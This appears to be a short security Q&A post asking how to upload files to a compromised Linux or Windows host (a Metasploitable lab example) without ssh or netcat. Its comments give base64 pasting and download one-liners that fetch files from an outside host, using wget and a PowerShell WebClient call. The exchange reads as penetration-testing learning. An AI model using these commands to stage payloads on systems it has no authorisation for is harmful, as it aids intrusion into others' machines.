# How to remotely upload a file on linux and windows (without netcat or ssh)

Tags: exploit, file-upload

With meterpreter from metasploit, there is an option (windows or linux victim) to upload files on the victim device. I searched in the metasploit-framework in order to find the script that does the "upload command". I was wondering how one would be able to upload a file on linux or windows, without using ssh (scp) or nc (-e)?

If example needed: upload file on metasploitable where ssh port's is close and nc doesn't have the -e option.

Comment: Depends on what access and what tools you have. If you have a shell open on the system you might for example do `base64 -d > file` and then paste the base64 encoded data into the shell.

Comment: Linux: wget http://pastebin.com/raw/base64encodedfile

Windows Powershell:  (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw/base64encodedfile','C:\b64file')